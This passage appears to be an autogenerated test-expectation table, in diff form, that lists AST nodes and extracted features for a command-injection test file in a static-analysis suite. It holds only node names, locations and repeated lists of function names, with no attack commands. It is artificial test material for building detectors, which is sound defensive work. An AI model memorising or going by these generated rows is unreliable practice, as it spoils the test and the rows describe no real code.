return of new cla2() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:22:29:31 | new cla2() | assignedToPropName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:22:29:31 | new cla2() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:22:29:31 | new cla2() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:22:29:31 | new cla2() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:26:29:29 | cla2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:26:29:29 | cla2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:29:26:29:29 | cla2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:19 | module.exports.lib2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:19 | module.exports.lib2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:19 | module.exports.lib2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:42 | module. ... b2.js") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:42 | module. ... b2.js") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:1:31:42 | module. ... b2.js") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:8:31:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:8:31:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:8:31:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:16:31:19 | lib2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:16:31:19 | lib2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:16:31:19 | lib2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:29 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:29 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:29 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:42 | exceptional return of require("./lib2.js") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:42 | exceptional return of require("./lib2.js") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:42 | exceptional return of require("./lib2.js") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:42 | require("./lib2.js") | assignedToPropName | lib2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:42 | require("./lib2.js") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:42 | require("./lib2.js") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:42 | require("./lib2.js") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:31:31:41 | "./lib2.js" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:31:31:41 | "./lib2.js" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:31:31:41 | "./lib2.js" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:31:31:41 | "./lib2.js" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:31:31:41 | "./lib2.js" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:31:31:41 | "./lib2.js" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:33:1:45:1 | Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:33:1:45:1 | Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:33:1:45:1 | Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:33:1:45:1 | class C ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:33:1:45:1 | class C ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:33:1:45:1 | class C ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:33:7:33:10 | Cla3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:33:7:33:10 | Cla3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:33:7:33:10 | Cla3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:2:34:12 | constructor | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:2:34:12 | constructor | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:2:34:12 | constructor | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:2:36:2 | constru ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:2:36:2 | constru ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:2:36:2 | constru ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:2:36:2 | constru ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:34:2:36:2 | constru ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 